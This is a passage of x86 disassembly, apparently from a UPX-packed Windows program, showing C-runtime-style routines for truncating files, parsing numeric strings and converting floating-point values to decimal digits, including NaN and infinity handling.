ds:dword_4DBC78 push dword ptr [eax+esi*4] call sub_41B0B1 mov eax, ds:dword_4DBC78 pop ecx and dword ptr [eax+esi*4], 0 loc_424EFC: ; CODE XREF: sub_4239DB+14F0j ; sub_4239DB+1508j inc esi cmp esi, ds:dword_4DCC80 jl short loc_424EC1 loc_424F05: ; CODE XREF: sub_4239DB+14E4j mov eax, edi pop edi pop esi retn ; END OF FUNCTION CHUNK FOR sub_4239DB ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_424F0A proc near ; CODE XREF: sub_423A33+271p var_1000 = byte ptr -1000h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp mov eax, 1000h call sub_41BB20 push ebx mov ebx, [ebp+arg_0] push esi xor esi, esi cmp ebx, ds:dword_4DCDA0 jnb loc_42503F mov eax, ebx mov ecx, ebx sar eax, 5 and ecx, 1Fh mov eax, ds:dword_4DCCA0[eax*4] test byte ptr [eax+ecx*8+4], 1 jz loc_42503F push 1 push esi push ebx call sub_42272B add esp, 0Ch cmp eax, 0FFFFFFFFh mov [ebp+arg_0], eax jz loc_425049 push 2 push esi push ebx call sub_42272B add esp, 0Ch cmp eax, 0FFFFFFFFh jz loc_425049 push edi mov edi, [ebp+arg_4] sub edi, eax test edi, edi jle short loc_424FEC push 1000h lea eax, [ebp+var_1000] push esi push eax call sub_41B590 push 8000h push ebx call sub_425B44 add esp, 14h mov [ebp+arg_4], eax loc_424FA0: ; CODE XREF: sub_424F0A+BDj mov eax, 1000h cmp edi, eax jge short loc_424FAB mov eax, edi loc_424FAB: ; CODE XREF: sub_424F0A+9Dj push eax lea eax, [ebp+var_1000] push eax push ebx call sub_42291D add esp, 0Ch cmp eax, 0FFFFFFFFh jz short loc_424FC9 sub edi, eax test edi, edi jle short loc_424FDF jmp short loc_424FA0 ; --------------------------------------------------------------------------- loc_424FC9: ; CODE XREF: sub_424F0A+B5j cmp ds:dword_4DB95C, 5 jnz short loc_424FDC mov ds:dword_4DB958, 0Dh loc_424FDC: ; CODE XREF: sub_424F0A+C6j or esi, 0FFFFFFFFh loc_424FDF: ; CODE XREF: sub_424F0A+BBj push [ebp+arg_4] push ebx call sub_425B44 pop ecx pop ecx jmp short loc_42502C ; --------------------------------------------------------------------------- loc_424FEC: ; CODE XREF: sub_424F0A+71j jge short loc_42502C push 0 push [ebp+arg_4] push ebx call sub_42272B push ebx call sub_4238A2 add esp, 10h push eax call dword_427010 ; SetEndOfFile mov esi, eax neg esi sbb esi, esi neg esi dec esi cmp esi, 0FFFFFFFFh jnz short loc_42502C mov ds:dword_4DB958, 0Dh call dword_42708C ; RtlGetLastWin32Error mov ds:dword_4DB95C, eax loc_42502C: ; CODE XREF: sub_424F0A+E0j ; sub_424F0A:loc_424FECj ... push 0 push [ebp+arg_0] push ebx call sub_42272B add esp, 0Ch mov eax, esi pop edi jmp short loc_42504C ; --------------------------------------------------------------------------- loc_42503F: ; CODE XREF: sub_424F0A+1Aj ; sub_424F0A+36j mov ds:dword_4DB958, 9 loc_425049: ; CODE XREF: sub_424F0A+4Ej ; sub_424F0A+63j or eax, 0FFFFFFFFh loc_42504C: ; CODE XREF: sub_424F0A+133j pop esi pop ebx leave retn sub_424F0A endp ; =============== S U B R O U T I N E ======================================= sub_425050 proc near ; CODE XREF: sub_4241CF+2Bp ; sub_4241CF+42p ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch mov edx, [esp+arg_0] push esi mov esi, [esp+4+arg_4] xor eax, eax lea ecx, [edx+esi] cmp ecx, edx jb short loc_425066 cmp ecx, esi jnb short loc_425069 loc_425066: ; CODE XREF: sub_425050+10j push 1 pop eax loc_425069: ; CODE XREF: sub_425050+14j mov edx, [esp+4+arg_8] pop esi mov [edx], ecx retn sub_425050 endp ; =============== S U B R O U T I N E ======================================= sub_425071 proc near ; CODE XREF: sub_42512A+40p ; sub_42512A+61p ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 push esi mov esi, [esp+4+arg_0] push edi mov edi, [esp+8+arg_4] push esi push dword ptr [edi] push dword ptr [esi] call sub_425050 add esp, 0Ch test eax, eax jz short loc_4250A3 lea eax, [esi+4] push eax push 1 push dword ptr [eax] call sub_425050 add esp, 0Ch test eax, eax jz short loc_4250A3 inc dword ptr [esi+8] loc_4250A3: ; CODE XREF: sub_425071+19j ; sub_425071+2Dj lea eax, [esi+4] push eax push dword ptr [edi+4] push dword ptr [eax] call sub_425050 add esp, 0Ch test eax, eax jz short loc_4250BB inc dword ptr [esi+8] loc_4250BB: ; CODE XREF: sub_425071+45j lea eax, [esi+8] push eax push dword ptr [edi+8] push dword ptr [eax] call sub_425050 add esp, 0Ch pop edi pop esi retn sub_425071 endp ; =============== S U B R O U T I N E ======================================= sub_4250CF proc near ; CODE XREF: sub_42512A+30p ; sub_42512A+36p ... arg_0 = dword ptr 4 mov eax, [esp+arg_0] push esi push edi mov esi, [eax] mov edi, [eax+4] mov ecx, esi add esi, esi mov [eax], esi lea esi, [edi+edi] shr ecx, 1Fh or esi, ecx mov ecx, [eax+8] mov edx, edi mov [eax+4], esi shr edx, 1Fh shl ecx, 1 or ecx, edx pop edi mov [eax+8], ecx pop esi retn sub_4250CF endp ; =============== S U B R O U T I N E ======================================= sub_4250FD proc near ; CODE XREF: sub_4256C2+1C8p ; sub_425BBA+17Dp arg_0 = dword ptr 4 mov eax, [esp+arg_0] push esi push edi mov edx, [eax+8] mov ecx, [eax+4] mov esi, edx mov edi, ecx shl esi, 1Fh shr ecx, 1 or ecx, esi mov [eax+4], ecx mov ecx, [eax] shl edi, 1Fh shr ecx, 1 shr edx, 1 or ecx, edi pop edi mov [eax+8], edx mov [eax], ecx pop esi retn sub_4250FD endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_42512A proc near ; CODE XREF: sub_4251F1+3CAp var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 10h mov eax, [ebp+arg_4] push ebx mov ebx, [ebp+arg_8] xor edx, edx cmp eax, edx push esi mov [ebp+var_4], 404Eh mov [ebx], edx mov [ebx+4], edx mov [ebx+8], edx jbe short loc_42519E push edi mov [ebp+arg_8], eax loc_425151: ; CODE XREF: sub_42512A+6Fj mov esi, ebx lea edi, [ebp+var_10] movsd movsd push ebx movsd call sub_4250CF push ebx call sub_4250CF lea eax, [ebp+var_10] push eax push ebx call sub_425071 push ebx call sub_4250CF mov eax, [ebp+arg_0] and [ebp+var_C], 0 and [ebp+var_8], 0 movsx eax, byte ptr [eax] mov [ebp+var_10], eax lea eax, [ebp+var_10] push eax push ebx call sub_425071 add esp, 1Ch inc [ebp+arg_0] dec [ebp+arg_8] jnz short loc_425151 xor edx, edx pop edi loc_42519E: ; CODE XREF: sub_42512A+21j ; sub_42512A+9Fj cmp [ebx+8], edx jnz short loc_4251CB mov ecx, [ebx+4] mov eax, ecx shr eax, 10h mov [ebx+8], eax mov eax, [ebx] mov esi, eax shr esi, 10h shl ecx, 10h or esi, ecx shl eax, 10h add [ebp+var_4], 0FFF0h mov [ebx+4], esi mov [ebx], eax jmp short loc_42519E ; --------------------------------------------------------------------------- loc_4251CB: ; CODE XREF: sub_42512A+77j mov esi, 8000h loc_4251D0: ; CODE XREF: sub_42512A+B9j test [ebx+8], esi jnz short loc_4251E5 push ebx call sub_4250CF add [ebp+var_4], 0FFFFh pop ecx jmp short loc_4251D0 ; --------------------------------------------------------------------------- loc_4251E5: ; CODE XREF: sub_42512A+A9j mov ax, word ptr [ebp+var_4] pop esi mov [ebx+0Ah], ax pop ebx leave retn sub_42512A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4251F1 proc near ; CODE XREF: sub_424518+17p ; sub_424545+17p var_5C = byte ptr -5Ch var_45 = byte ptr -45h var_40 = dword ptr -40h var_3A = dword ptr -3Ah var_36 = dword ptr -36h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch arg_18 = dword ptr 20h push ebp mov ebp, esp sub esp, 5Ch push ebx push esi push edi mov edi, [ebp+arg_8] lea eax, [ebp+var_5C] push 1 mov [ebp+var_C], eax xor eax, eax pop edx mov [ebp+var_28], eax mov [ebp+var_18], edx mov [ebp+var_4], eax mov [ebp+var_10], eax mov [ebp+var_24], eax mov [ebp+var_20], eax mov [ebp+var_2C], eax mov [ebp+var_30], eax mov [ebp+var_1C], eax mov [ebp+var_8], eax mov [ebp+var_14], eax mov [ebp+arg_8], edi loc_42522C: ; CODE XREF: sub_4251F1+52j mov cl, [edi] cmp cl, 20h jz short loc_425242 cmp cl, 9 jz short loc_425242 cmp cl, 0Ah jz short loc_425242 cmp cl, 0Dh jnz short loc_425245 loc_425242: ; CODE XREF: sub_4251F1+40j ; sub_4251F1+45j ... inc edi jmp short loc_42522C ; --------------------------------------------------------------------------- loc_425245: ; CODE XREF: sub_4251F1+4Fj push 4 pop esi loc_425248: ; CODE XREF: sub_4251F1+AEj ; sub_4251F1+B7j ... mov bl, [edi] inc edi cmp eax, 0Bh ; switch 12 cases ja loc_4254CB ; default ; jumptable 00425254 case 10 jmp off_425692[eax*4] ; switch jump loc_42525B: ; DATA XREF: UPX0:off_425692o cmp bl, 31h ; jumptable 00425254 case 0 jl short loc_42526C cmp bl, 39h jg short loc_42526C loc_425265: ; CODE XREF: sub_4251F1+C4j ; sub_4251F1+118j push 3 jmp loc_425489 ; --------------------------------------------------------------------------- loc_42526C: ; CODE XREF: sub_4251F1+6Dj ; sub_4251F1+72j cmp bl, byte_43CBE8 jnz short loc_42527B loc_425274: ; CODE XREF: sub_4251F1+124j push 5 jmp loc_4254C1 ; --------------------------------------------------------------------------- loc_42527B: ; CODE XREF: sub_4251F1+81j movsx eax, bl sub eax, 2Bh jz short loc_4252A1 dec eax dec eax jz short loc_425295 sub eax, 3 jnz loc_425564 jmp loc_425324 ; --------------------------------------------------------------------------- loc_425295: ; CODE XREF: sub_4251F1+94j push 2 mov [ebp+var_28], 8000h pop eax jmp short loc_425248 ; --------------------------------------------------------------------------- loc_4252A1: ; CODE XREF: sub_4251F1+90j and [ebp+var_28], 0 push 2 pop eax jmp short loc_425248 ; --------------------------------------------------------------------------- loc_4252AA: ; CODE XREF: sub_4251F1+63j ; DATA XREF: UPX0:off_425692o cmp bl, 31h ; jumptable 00425254 case 1 mov [ebp+var_10], edx jl short loc_4252B7 cmp bl, 39h jle short loc_425265 loc_4252B7: ; CODE XREF: sub_4251F1+BFj cmp bl, byte_43CBE8 jz loc_42537F cmp bl, 2Bh jz short loc_4252F9 cmp bl, 2Dh jz short loc_4252F9 cmp bl, 30h jz short loc_425324 loc_4252D2: ; CODE XREF: sub_4251F1+207j cmp bl, 43h jle loc_425564 cmp bl, 45h jle short loc_4252F2 cmp bl, 63h jle loc_425564 cmp bl, 65h jg loc_425564 loc_4252F2: ; CODE XREF: sub_4251F1+EDj push 6 jmp loc_4254C1 ; --------------------------------------------------------------------------- loc_4252F9: ; CODE XREF: sub_4251F1+D5j ; sub_4251F1+DAj ... dec edi push 0Bh jmp loc_4254C1 ; --------------------------------------------------------------------------- loc_425301: ; CODE XREF: sub_4251F1+63j ; DATA XREF: UPX0:off_425692o cmp bl, 31h ; jumptable 00425254 case 2 jl short loc_42530F cmp bl, 39h jle loc_425265 loc_42530F: ; CODE XREF: sub_4251F1+113j cmp bl, byte_43CBE8 jz loc_425274 cmp bl, 30h jnz loc_4254D9 loc_425324: ; CODE XREF: sub_4251F1+9Fj ; sub_4251F1+DFj mov eax, edx jmp loc_425248 ; --------------------------------------------------------------------------- loc_42532B: ; CODE XREF: sub_4251F1+63j ; DATA XREF: UPX0:off_425692o mov [ebp+var_10], edx ; jumptable 00425254 case 3 loc_42532E: ; CODE XREF: sub_4251F1+184j cmp dword_43CBE4, edx jle short loc_425347 movzx eax, bl push esi push eax call sub_41F515 pop ecx pop ecx push 1 pop edx jmp short loc_425355 ; --------------------------------------------------------------------------- loc_425347: ; CODE XREF: sub_4251F1+143j mov ecx, off_43C9D8 movzx eax, bl mov al, [ecx+eax*2] and eax, esi loc_425355: ; CODE XREF: sub_4251F1+154j test eax, eax jz short loc_425377 cmp [ebp+var_4], 19h jnb short loc_42536F mov eax, [ebp+var_C] inc [ebp+var_4] sub bl, 30h inc [ebp+var_C] mov [eax], bl jmp short loc_425372 ; --------------------------------------------------------------------------- loc_42536F: ; CODE XREF: sub_4251F1+16Cj inc [ebp+var_8] loc_425372: ; CODE XREF: sub_4251F1+17Cj mov bl, [edi] inc edi jmp short loc_42532E ; --------------------------------------------------------------------------- loc_425377: ; CODE XREF: sub_4251F1+166j cmp bl, byte_43CBE8 jnz short loc_4253E6 loc_42537F: ; CODE XREF: sub_4251F1+CCj mov eax, esi jmp loc_425248 ; --------------------------------------------------------------------------- loc_425386: ; CODE XREF: sub_4251F1+63j ; DATA XREF: UPX0:off_425692o cmp [ebp+var_4], 0 ; jumptable 00425254 case 4 mov [ebp+var_10], edx mov [ebp+var_24], edx jnz short loc_42539F loc_425392: ; CODE XREF: sub_4251F1+1ACj cmp bl, 30h jnz short loc_42539F dec [ebp+var_8] mov bl, [edi] inc edi jmp short loc_425392 ; --------------------------------------------------------------------------- loc_42539F: ; CODE XREF: sub_4251F1+19Fj ; sub_4251F1+1A4j ... cmp dword_43CBE4, edx jle short loc_4253B8 movzx eax, bl push esi push eax call sub_41F515 pop ecx pop ecx push 1 pop edx jmp short loc_4253C6 ; --------------------------------------------------------------------------- loc_4253B8: ; CODE XREF: sub_4251F1+1B4j mov ecx, off_43C9D8 movzx eax, bl mov al, [ecx+eax*2] and eax, esi loc_4253C6: ; CODE XREF: sub_4251F1+1C5j test eax, eax jz short loc_4253E6 cmp [ebp+var_4], 19h jnb short loc_4253E1 mov eax, [ebp+var_C] inc [ebp+var_4] sub bl, 30h inc [ebp+var_C] dec [ebp+var_8] mov [eax], bl loc_4253E1: ; CODE XREF: sub_4251F1+1DDj mov bl, [edi] inc edi jmp short loc_42539F ; --------------------------------------------------------------------------- loc_4253E6: ; CODE XREF: sub_4251F1+18Cj ; sub_4251F1+1D7j cmp bl, 2Bh jz loc_4252F9 cmp bl, 2Dh jz loc_4252F9 jmp loc_4252D2 ; --------------------------------------------------------------------------- loc_4253FD: ; CODE XREF: sub_4251F1+63j ; DATA XREF: UPX0:off_425692o cmp dword_43CBE4, edx ; jumptable 00425254 case 5 mov [ebp+var_24], edx jle short loc_425419 movzx eax, bl push esi push eax call sub_41F515 pop ecx pop ecx push 1 pop edx jmp short loc_425427 ; --------------------------------------------------------------------------- loc_425419: ; CODE XREF: sub_4251F1+215j mov ecx, off_43C9D8 movzx eax, bl mov al, [ecx+eax*2] and eax, esi loc_425427: ; CODE XREF: sub_4251F1+226j test eax, eax jz loc_4254D9 mov eax, esi jmp short loc_42548A ; --------------------------------------------------------------------------- loc_425433: ; CODE XREF: sub_4251F1+63j ; DATA XREF: UPX0:off_425692o lea ecx, [edi-2] ; jumptable 00425254 case 6 cmp bl, 31h mov [ebp+arg_8], ecx jl short loc_425443 cmp bl, 39h jle short loc_425487 loc_425443: ; CODE XREF: sub_4251F1+24Bj movsx eax, bl sub eax, 2Bh jz short loc_4254BF dec eax dec eax jz short loc_4254B3 sub eax, 3 jnz loc_425567 loc_425458: ; CODE XREF: sub_4251F1+2A4j push 8 jmp short loc_4254C1 ; --------------------------------------------------------------------------- loc_42545C: ; CODE XREF: sub_4251F1+63j ; DATA XREF: UPX0:off_425692o mov [ebp+var_20], edx ; jumptable 00425254 case 8 loc_42545F: ; CODE XREF: sub_4251F1+276j cmp bl, 30h jnz short loc_425469 mov bl, [edi] inc edi jmp short loc_42545F ; --------------------------------------------------------------------------- loc_425469: ; CODE XREF: sub_4251F1+271j cmp bl, 31h jl loc_425564 cmp bl, 39h jg loc_425564 jmp short loc_425487 ; --------------------------------------------------------------------------- loc_42547D: ; CODE XREF: sub_4251F1+63j ; DATA XREF: UPX0:off_425692o cmp bl, 31h ; jumptable 00425254 case 7 jl short loc_425490 cmp bl, 39h jg short loc_425490 loc_425487: ; CODE XREF: sub_4251F1+250j ; sub_4251F1+28Aj push 9 loc_425489: ; CODE XREF: sub_4251F1+76j pop eax loc_42548A: ; CODE XREF: sub_4251F1+240j dec edi jmp loc_425248 ; --------------------------------------------------------------------------- loc_425490: ; CODE XREF: sub_4251F1+28Fj ; sub_4251F1+294j cmp bl, 30h jnz short loc_4254D9 jmp short loc_425458 ; --------------------------------------------------------------------------- loc_425497: ; CODE XREF: sub_4251F1+63j ; DATA XREF: UPX0:off_425692o cmp [ebp+arg_18], 0 ; jumptable 00425254 case 11 jz short loc_4254C7 movsx eax, bl lea ecx, [edi-1] sub eax, 2Bh mov [ebp+arg_8], ecx jz short loc_4254BF dec eax dec eax jnz loc_425567 loc_4254B3: ; CODE XREF: sub_4251F1+25Cj or [ebp+var_18], 0FFFFFFFFh push 7 pop eax jmp loc_425248 ; --------------------------------------------------------------------------- loc_4254BF: ; CODE XREF: sub_4251F1+258j ; sub_4251F1+2B8j push 7 loc_4254C1: ; CODE XREF: sub_4251F1+85j ; sub_4251F1+103j ... pop eax jmp loc_425248 ; --------------------------------------------------------------------------- loc_4254C7: ; CODE XREF: sub_4251F1+2AAj push 0Ah dec edi pop eax loc_4254CB: ; CODE XREF: sub_4251F1+5Dj ; sub_4251F1+63j ; DATA XREF: ... cmp eax, 0Ah ; default ; jumptable 00425254 case 10 jz loc_425569 jmp loc_425248 ; --------------------------------------------------------------------------- loc_4254D9: ; CODE XREF: sub_4251F1+12Dj ; sub_4251F1+238j ... mov edi, [ebp+arg_8] jmp loc_425569 ; --------------------------------------------------------------------------- loc_4254E1: ; CODE XREF: sub_4251F1+63j ; DATA XREF: UPX0:off_425692o mov [ebp+var_20], 1 ; jumptable 00425254 case 9 xor esi, esi loc_4254EA: ; CODE XREF: sub_4251F1+339j cmp dword_43CBE4, 1 jle short loc_425502 movzx eax, bl push 4 push eax call sub_41F515 pop ecx pop ecx jmp short loc_425511 ; --------------------------------------------------------------------------- loc_425502: ; CODE XREF: sub_4251F1+300j mov ecx, off_43C9D8 movzx eax, bl mov al, [ecx+eax*2] and eax, 4 loc_425511: ; CODE XREF: sub_4251F1+30Fj test eax, eax jz short loc_425531 movsx ecx, bl lea eax, [esi+esi*4] lea esi, [ecx+eax*2-30h] cmp esi, 1450h jg short loc_42552C mov bl, [edi] inc edi jmp short loc_4254EA ; --------------------------------------------------------------------------- loc_42552C: ; CODE XREF: sub_4251F1+334j mov esi, 1451h loc_425531: ; CODE XREF: sub_4251F1+322j mov [ebp+var_1C], esi loc_425534: ; CODE XREF: sub_4251F1+371j cmp dword_43CBE4, 1 jle short loc_42554C movzx eax, bl push 4 push eax call sub_41F515 pop ecx pop ecx jmp short loc_42555B ; --------------------------------------------------------------------------- loc_42554C: ; CODE XREF: sub_4251F1+34Aj mov ecx, off_43C9D8 movzx eax, bl mov al, [ecx+eax*2] and eax, 4 loc_42555B: ; CODE XREF: sub_4251F1+359j test eax, eax jz short loc_425564 mov bl, [edi] inc edi jmp short loc_425534 ; --------------------------------------------------------------------------- loc_425564: ; CODE XREF: sub_4251F1+99j ; sub_4251F1+E4j ... dec edi jmp short loc_425569 ; --------------------------------------------------------------------------- loc_425567: ; CODE XREF: sub_4251F1+261j ; sub_4251F1+2BCj mov edi, ecx loc_425569: ; CODE XREF: sub_4251F1+2DDj ; sub_4251F1+2EBj ... mov eax, [ebp+arg_4] cmp [ebp+var_10], 0 mov [eax], edi jz loc_425651 push 18h pop eax cmp [ebp+var_4], eax jbe short loc_425595 cmp [ebp+var_45], 5 jl short loc_425589 inc [ebp+var_45] loc_425589: ; CODE XREF: sub_4251F1+393j mov [ebp+var_4], eax mov eax, [ebp+var_C] dec eax inc [ebp+var_8] jmp short loc_425598 ; --------------------------------------------------------------------------- loc_425595: ; CODE XREF: sub_4251F1+38Dj mov eax, [ebp+var_C] loc_425598: ; CODE XREF: sub_4251F1+3A2j cmp [ebp+var_4], 0 jbe loc_425647 loc_4255A2: ; CODE XREF: sub_4251F1+3BDj dec eax cmp byte ptr [eax], 0 jnz short loc_4255B0 dec [ebp+var_4] inc [ebp+var_8] jmp short loc_4255A2 ; --------------------------------------------------------------------------- loc_4255B0: ; CODE XREF: sub_4251F1+3B5j lea eax, [ebp+var_40] push eax lea eax, [ebp+var_5C] push [ebp+var_4] push eax call sub_42512A mov eax, [ebp+var_1C] xor ecx, ecx add esp, 0Ch cmp [ebp+var_18], ecx jge short loc_4255CF neg eax loc_4255CF: ; CODE XREF: sub_4251F1+3DAj add eax, [ebp+var_8] cmp [ebp+var_20], ecx jnz short loc_4255DA add eax, [ebp+arg_10] loc_4255DA: ; CODE XREF: sub_4251F1+3E4j cmp [ebp+var_24], ecx jnz short loc_4255E2 sub eax, [ebp+arg_14] loc_4255E2: ; CODE XREF: sub_4251F1+3ECj cmp eax, 1450h jle short loc_425619 mov [ebp+var_2C], 1 loc_4255F0: ; CODE XREF: sub_4251F1+436j mov ebx, [ebp+arg_8] mov esi, [ebp+arg_8] mov eax, [ebp+arg_8] mov edx, [ebp+arg_8] loc_4255FC: ; CODE XREF: sub_4251F1+454j ; sub_4251F1+45Ej cmp [ebp+var_2C], 0 jz short loc_425662 xor ebx, ebx mov eax, 7FFFh mov esi, 80000000h xor edx, edx mov [ebp+var_14], 2 jmp short loc_425677 ; --------------------------------------------------------------------------- loc_425619: ; CODE XREF: sub_4251F1+3F6j cmp eax, 0FFFFEBB0h jge short loc_425629 mov [ebp+var_30], 1 jmp short loc_4255F0 ; --------------------------------------------------------------------------- loc_425629: ; CODE XREF: sub_4251F1+42Dj push [ebp+arg_C] push eax lea eax, [ebp+var_40] push eax call sub_425DDA mov edx, [ebp+var_40] mov ebx, [ebp+var_40+2] mov esi, [ebp+var_3A] mov eax, [ebp+var_36] add esp, 0Ch jmp short loc_4255FC ; --------------------------------------------------------------------------- loc_425647: ; CODE XREF: sub_4251F1+3ABj xor edx, edx xor eax, eax xor esi, esi xor ebx, ebx jmp short loc_4255FC ; --------------------------------------------------------------------------- loc_425651: ; CODE XREF: sub_4251F1+381j xor edx, edx xor eax, eax xor esi, esi xor ebx, ebx mov [ebp+var_14], 4 jmp short loc_425677 ; --------------------------------------------------------------------------- loc_425662: ; CODE XREF: sub_4251F1+40Fj cmp [ebp+var_30], 0 jz short loc_425677 xor edx, edx xor eax, eax xor esi, esi xor ebx, ebx mov [ebp+var_14], 1 loc_425677: ; CODE XREF: sub_4251F1+426j ; sub_4251F1+46Fj ... mov ecx, [ebp+arg_0] or eax, [ebp+var_28] pop edi mov [ecx+6], esi mov [ecx+2], ebx mov [ecx+0Ah], ax mov eax, [ebp+var_14] pop esi mov [ecx], dx pop ebx leave retn sub_4251F1 endp ; --------------------------------------------------------------------------- off_425692 dd offset loc_42525B ; DATA XREF: sub_4251F1+63r dd offset loc_4252AA ; jump table for switch statement dd offset loc_425301 dd offset loc_42532B dd offset loc_425386 dd offset loc_4253FD dd offset loc_425433 dd offset loc_42547D dd offset loc_42545C dd offset loc_4254E1 dd offset loc_4254CB dd offset loc_425497 ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4256C2 proc near ; CODE XREF: sub_4245E9+2Cp var_1C = byte ptr -1Ch var_1B = byte ptr -1Bh var_1A = byte ptr -1Ah var_19 = byte ptr -19h var_18 = byte ptr -18h var_17 = byte ptr -17h var_16 = byte ptr -16h var_15 = byte ptr -15h var_14 = byte ptr -14h var_13 = byte ptr -13h var_12 = byte ptr -12h var_11 = byte ptr -11h var_10 = word ptr -10h var_E = dword ptr -0Eh var_A = dword ptr -0Ah var_6 = word ptr -6 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = byte ptr 18h arg_14 = dword ptr 1Ch push ebp mov ebp, esp sub esp, 1Ch mov eax, [ebp+arg_8] push ebx mov ebx, [ebp+arg_14] push esi mov ecx, eax mov esi, 7FFFh and ecx, 8000h and eax, esi test cx, cx push edi mov [ebp+var_1C], 0CCh mov [ebp+var_1B], 0CCh mov [ebp+var_1A], 0CCh mov [ebp+var_19], 0CCh mov [ebp+var_18], 0CCh mov [ebp+var_17], 0CCh mov [ebp+var_16], 0CCh mov [ebp+var_15], 0CCh mov [ebp+var_14], 0CCh mov [ebp+var_13], 0CCh mov [ebp+var_12], 0FBh mov [ebp+var_11], 3Fh mov [ebp+var_4], 1 mov edx, eax jz short loc_425724 mov byte ptr [ebx+2], 2Dh jmp short loc_425728 ; --------------------------------------------------------------------------- loc_425724: ; CODE XREF: sub_4256C2+5Aj mov byte ptr [ebx+2], 20h loc_425728: ; CODE XREF: sub_4256C2+60j mov edi, [ebp+arg_4] test dx, dx jnz short loc_42574E test edi, edi jnz short loc_42574E cmp [ebp+arg_0], edi jnz short loc_42574E loc_425739: ; CODE XREF: sub_4256C2+181j and word ptr [ebx], 0 mov byte ptr [ebx+2], 20h mov byte ptr [ebx+3], 1 mov byte ptr [ebx+4], 30h jmp loc_42594C ; --------------------------------------------------------------------------- loc_42574E: ; CODE XREF: sub_4256C2+6Cj ; sub_4256C2+70j ... cmp dx, si jnz short loc_4257CD mov eax, 80000000h mov word ptr [ebx], 1 cmp edi, eax jnz short loc_425767 cmp [ebp+arg_0], 0 jz short loc_425776 loc_425767: ; CODE XREF: sub_4256C2+9Dj test edi, 40000000h jnz short loc_425776 push offset a1Snan ; "1#SNAN" jmp short loc_4257BC ; --------------------------------------------------------------------------- loc_425776: ; CODE XREF: sub_4256C2+A3j ; sub_4256C2+ABj test cx, cx jz short loc_425790 cmp edi, 0C0000000h jnz short loc_425790 cmp [ebp+arg_0], 0 jnz short loc_4257B7 push offset a1Ind ; "1#IND" jmp short loc_42579F ; --------------------------------------------------------------------------- loc_425790: ; CODE XREF: sub_4256C2+B7j ; sub_4256C2+BFj cmp edi, eax jnz short loc_4257B7 cmp [ebp+arg_0], 0 jnz short loc_4257B7 push offset a1Inf ; "1#INF" loc_42579F: ; CODE XREF: sub_4256C2+CCj lea eax, [ebx+4] push eax call sub_41BEB0 pop ecx mov byte ptr [ebx+3], 5 pop ecx loc_4257AE: ; CODE XREF: sub_4256C2+109j and [ebp+var_4], 0 jmp loc_425925 ; --------------------------------------------------------------------------- loc_4257B7: ; CODE XREF: sub_4256C2+C5j ; sub_4256C2+D0j ... push offset a1Qnan ; "1#QNAN" loc_4257BC: ; CODE XREF: sub_4256C2+B2j lea eax, [ebx+4] push eax call sub_41BEB0 pop ecx mov byte ptr [ebx+3], 6 pop ecx jmp short loc_4257AE ; --------------------------------------------------------------------------- loc_4257CD: ; CODE XREF: sub_4256C2+8Fj movzx eax, dx mov ecx, edi mov esi, eax shr ecx, 18h imul eax, 4D10h shr esi, 8 and [ebp+var_10], 0 push 1 lea ecx, [esi+ecx*2] mov [ebp+var_6], dx imul ecx, 4Dh mov [ebp+var_A], edi lea esi, [ecx+eax-134312F4h] mov eax, [ebp+arg_0] sar esi, 10h mov [ebp+var_E], eax movsx eax, si neg eax push eax lea eax, [ebp+var_10] push eax call sub_425DDA add esp, 0Ch cmp [ebp+var_6], 3FFFh jb short loc_42582E lea eax, [ebp+var_1C] inc esi push eax lea eax, [ebp+var_10] push eax call sub_425BBA pop ecx pop ecx loc_42582E: ; CODE XREF: sub_4256C2+15Aj test [ebp+arg_10], 1 mov [ebx], si jz short loc_425848 mov edi, [ebp+arg_C] movsx eax, si add edi, eax test edi, edi jg short loc_42584B jmp loc_425739 ; --------------------------------------------------------------------------- loc_425848: ; CODE XREF: sub_4256C2+173j mov edi, [ebp+arg_C] loc_42584B: ; CODE XREF: sub_4256C2+17Fj cmp edi, 15h jle short loc_425853 push 15h pop edi loc_425853: ; CODE XREF: sub_4256C2+18Cj movzx esi, [ebp+var_6] sub esi, 3FFEh and [ebp+var_6], 0 mov [ebp+arg_14], 8 loc_425869: ; CODE XREF: sub_4256C2+1B4j lea eax, [ebp+var_10] push eax call sub_4250CF dec [ebp+arg_14] pop ecx jnz short loc_425869 test esi, esi jge short loc_425893 neg esi and esi, 0FFh jle short loc_425893 loc_425886: ; CODE XREF: sub_4256C2+1CFj lea eax, [ebp+var_10] push eax call sub_4250FD dec esi pop ecx jnz short loc_425886 loc_425893: ; CODE XREF: sub_4256C2+1B8j ; sub_4256C2+1C2j lea ecx, [edi+1] lea eax, [ebx+4] test ecx, ecx mov [ebp+arg_14], eax jle short loc_4258F0 mov [ebp+arg_C], ecx loc_4258A3: ; CODE XREF: sub_4256C2+229j lea esi, [ebp+var_10] lea edi, [ebp+arg_0] movsd movsd lea eax, [ebp+var_10] push eax movsd call sub_4250CF lea eax, [ebp+var_10] push eax call sub_4250CF lea eax, [ebp+arg_0] push eax lea eax, [ebp+var_10] push eax call sub_425071 lea eax, [ebp+var_10] push eax call sub_4250CF mov al, byte ptr [ebp+var_6+1] mov ecx, [ebp+arg_14] and byte ptr [ebp+var_6+1], 0 add esp, 14h add al, 30h inc [ebp+arg_14] dec [ebp+arg_C] mov [ecx], al jnz short loc_4258A3 mov eax, [ebp+arg_14] 